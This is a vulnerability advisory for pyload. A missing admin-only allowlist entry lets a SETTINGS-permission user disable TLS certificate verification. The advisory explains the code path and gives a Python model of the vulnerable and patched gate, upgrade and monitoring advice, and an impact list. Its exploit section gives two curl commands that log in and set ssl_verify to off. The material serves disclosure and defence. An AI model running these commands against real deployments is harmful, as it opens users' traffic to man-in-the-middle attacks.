The `set_config_value()` API method (decorated with `@permission(Perms.SETTINGS)`) gates security-sensitive options behind the `ADMIN_ONLY_CORE_OPTIONS` allowlist. The entry `("general", "ssl_verify")` is missing from that allowlist, so an authenticated user holding the non-admin `SETTINGS` permission can set `general.ssl_verify = off`. The value is persisted to disk verbatim because `config.set()` → `cast()` has no branch for enum-string types. When a new `pycurl` handle is built, `get_options()` reads the setting and passes it to the HTTP sink. There, if `options["ssl_verify"]` is not `True`, `b"on"` or `b"on (using aia-chaser)"`, both `SSL_VERIFYPEER` and `SSL_VERIFYHOST` are set to 0, disabling TLS peer and hostname verification completely.
The change takes effect on the very next outbound request; no restart is required. An on-path attacker can then present forged certificates for any hostname pyload fetches (downloads, captcha retrieval, update checks, plugin HTTP calls). This is a direct continuation of the fix family CVE‑2026‑33509 / CVE‑2026‑35463 / CVE‑2026‑35464 / CVE‑2026‑35586, each of which patched a different option missed from the same allowlist.
DailyCVE Form:
Platform: pyload
Version: <=0.5.0b3.dev99
Vulnerability: TLS Bypass
Severity: Medium
Date: 2026-05-04
Prediction: 2026-05-04
What Undercode Say:
Analytics – The vulnerability allows any authenticated user with `Perms.SETTINGS` (but not admin) to silently disable TLS verification for every outbound connection pyload makes. In multi-user deployments where the settings permission is delegated to non-admins, a low-privilege account can therefore weaken a control that the allowlist is meant to reserve for administrators.
Exploit:
1) Authenticate as a non-admin user that holds the SETTINGS permission:
   curl -c cookies.txt -X POST http://pyload.example:8000/api/login \
     -d 'username=settings_user&password=<password>'
2) Disable TLS verification for all outbound requests:
   curl -b cookies.txt -X POST http://pyload.example:8000/api/setConfigValue \
     -d 'category=general&option=ssl_verify&value=off&section=core'
3) Any HTTPS request pyload makes from this point on accepts forged certificates; no restart is needed.
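The following model replays the authorization gate described above and the pycurl sink that consumes `general.ssl_verify`, with the vulnerable allowlist beside the patched one. It is an added example, not pyload's code: the names `ADMIN_ONLY_CORE_OPTIONS`, `Perms.SETTINGS`, `set_config_value`, `cast`, `get_options`, `SSL_VERIFYPEER` and `SSL_VERIFYHOST` come from the write-up, while the other allowlist entries, the function bodies and the str-to-bytes conversion in the sink are simplified assumptions made for illustration.

```python
"""Reconstruction of the ADMIN_ONLY_CORE_OPTIONS gate and the ssl_verify sink.

Added example, not pyload's own code.  Only the names listed in the lead-in
are taken from the write-up; everything else is a simplified assumption.
"""
from enum import IntFlag


class Perms(IntFlag):
    LIST = 1
    DOWNLOAD = 2
    SETTINGS = 4
    ADMIN = 8


# Options a SETTINGS-only user must not be able to change.  The first entries
# are illustrative placeholders; the vulnerable list lacks the
# ("general", "ssl_verify") pair and the patched list adds it.
ADMIN_ONLY_CORE_OPTIONS_VULNERABLE = frozenset({
    ("webui", "use_ssl"),       # named on the page as admin-only
    ("proxy", "username"),      # placeholder for "proxy credentials"
    ("proxy", "password"),
})
ADMIN_ONLY_CORE_OPTIONS_PATCHED = ADMIN_ONLY_CORE_OPTIONS_VULNERABLE | {
    ("general", "ssl_verify"),
}


class PermissionDenied(Exception):
    pass


def cast(value):
    """Reconstructed cast(): digits become int, but there is no branch for
    enum-string options, so "on"/"off" are stored verbatim."""
    if isinstance(value, str) and value.strip().lstrip("-").isdigit():
        return int(value)
    return value


class ConfigStore:
    def __init__(self, admin_only):
        self.admin_only = admin_only
        self.values = {("general", "ssl_verify"): "on"}   # shipped default

    def set_config_value(self, user_perms, category, option, value, section="core"):
        # Equivalent of @permission(Perms.SETTINGS); admins hold every permission.
        if not user_perms & (Perms.SETTINGS | Perms.ADMIN):
            raise PermissionDenied("SETTINGS permission required")
        # The allowlist check the vulnerable release never reaches for ssl_verify.
        if (section == "core" and (category, option) in self.admin_only
                and not user_perms & Perms.ADMIN):
            raise PermissionDenied(f"{category}.{option} is admin-only")
        self.values[(category, option)] = cast(value)   # persisted as-is


def get_options(store):
    """Subset of the settings handed to a freshly built pycurl handle."""
    return {"ssl_verify": store.values[("general", "ssl_verify")]}


def curl_verify_options(options):
    """The sink check from the write-up: anything other than True, b"on" or
    b"on (using aia-chaser)" zeroes both verification flags.  Encoding str to
    bytes here is an assumption about where that conversion happens."""
    value = options["ssl_verify"]
    if isinstance(value, str):
        value = value.encode()
    if value is True or value in (b"on", b"on (using aia-chaser)"):
        return {"SSL_VERIFYPEER": 1, "SSL_VERIFYHOST": 2}
    return {"SSL_VERIFYPEER": 0, "SSL_VERIFYHOST": 0}


def attempt(admin_only, user_perms, value="off"):
    """Replay the exploit against a store built with the given allowlist and
    return (outcome, flags the next pycurl handle would receive)."""
    store = ConfigStore(admin_only)
    try:
        store.set_config_value(user_perms, "general", "ssl_verify", value)
        outcome = "accepted"
    except PermissionDenied:
        outcome = "denied"
    return outcome, curl_verify_options(get_options(store))


if __name__ == "__main__":
    for label, allowlist in (("vulnerable", ADMIN_ONLY_CORE_OPTIONS_VULNERABLE),
                             ("patched", ADMIN_ONLY_CORE_OPTIONS_PATCHED)):
        print(label, attempt(allowlist, Perms.SETTINGS))
```

With the vulnerable allowlist a SETTINGS-only user lands `off` in the store and the next handle is built with both flags at 0; with the patched allowlist the same call is refused and verification stays on, while an admin can still change the option deliberately.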
Protection from this CVE
- Upgrade to pyload `0.5.0b3.dev100` or later.
- If upgrading is not immediately possible, restrict the `SETTINGS` permission exclusively to trusted administrators.
- Monitor logs for unexpected changes to `general.ssl_verify`, and treat any value other than `on` as an incident until an administrator confirms it (the API endpoint logs configuration modifications, so the change is visible after the fact even though no restart occurs).
Impact
- Full man-in-the-middle on all HTTPS traffic initiated by pyload (downloads, captcha fetches, update checks, plugin HTTP calls).
- Compounds the earlier SSRF fixes (CVE‑2026‑33992 / CVE‑2026‑35459): with peer and hostname verification off, a redirect or DNS answer that lands pyload on an attacker-controlled host is accepted over HTTPS without any certificate check.
- Silent to administrators: the other security-critical options (proxy credentials, SSL certificates, `webui.use_ssl`) remain admin-only, creating a false sense of security.
- Unaffected: unauthenticated attackers; users holding only the `DOWNLOAD` / `LIST` permissions.
Sources:
Reported By: github.com